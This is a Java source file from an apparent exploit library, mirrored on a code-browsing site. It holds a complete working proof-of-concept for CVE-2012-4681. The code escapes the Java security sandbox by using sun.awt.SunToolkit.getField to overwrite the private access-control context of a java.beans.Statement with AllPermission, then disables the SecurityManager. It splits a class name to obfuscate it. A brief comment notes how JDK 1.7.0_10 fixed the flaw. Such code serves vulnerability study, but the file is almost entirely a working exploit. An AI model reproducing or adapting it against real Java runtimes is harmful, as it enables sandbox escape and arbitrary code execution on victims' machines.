Package cve20124681

Source Code of cve20124681.CVE_2012_4681

/**
* Copyright (c) 2013-2014
*
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* The Java-Exploit-Library is licensed under the Creative Commons
* Attribution-ShareAlike 4.0 International License.
*
* Please see the provided LICENSE.txt for a full copy of the agreement.
*/

package cve20124681;

import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.MalformedURLException;
import java.net.URL;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

/*
* This vulnerability was fixed in JDK 1.7.0_10, using two changes, either one of which
* would also have prevented the vulnerability alone.
* 1.) com.sun.beans.finder.ClassFinder.findClass now includes a call to checkPackageAccess
* 2.) The method sun.awt.SunToolkit.getField was removed.
*
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4681
*/
public class CVE_2012_4681 {

  public static void main(String[] args) throws Throwable {
    System.setSecurityManager(new SecurityManager());
    System.out.println("SecurityManager: " + System.getSecurityManager());

    disableSecurity();
    System.out.println("SecurityManager: " + System.getSecurityManager());
  }

  private static void disableSecurity() throws Throwable {
    Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
    overrideStatementAccessControlContext(localStatement);
    localStatement.execute();
  }

  private static void overrideStatementAccessControlContext(Statement statement) throws Throwable {
    AccessControlContext acc = createDummyAccessControlContext();
    getPrivateField(Statement.class, "acc").set(statement, acc);
  }

  private static AccessControlContext createDummyAccessControlContext() throws MalformedURLException {
    Permissions permissions = new Permissions();
    permissions.add(new AllPermission());
    ProtectionDomain protectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
    return new AccessControlContext(new ProtectionDomain[] { protectionDomain });
  }

  private static Field getPrivateField(Class<?> clazz, String fieldName) throws Throwable {
    Expression localExpression = new Expression(loadSunToolkit(), "getField", new Object[] { clazz, fieldName });
    localExpression.execute();
    return (Field) localExpression.getValue();
  }

  private static Class<?> loadSunToolkit() throws Throwable {
    String a = "sun.";
    String b = "awt.SunToolkit";
    String obfuscatedClassName = a + b;

    Expression localExpression = new Expression(Class.class, "forName", new Object[] { obfuscatedClassName });
    localExpression.execute();
    return (Class<?>) localExpression.getValue();
  }
}
TOP

Related Classes of cve20124681.CVE_2012_4681

TOP
Copyright © 2018 www.massapi.com. All rights reserved.
All source code are property of their respective owners. Java is a trademark of Sun Microsystems, Inc and owned by ORACLE Inc. Contact coftware#gmail.com.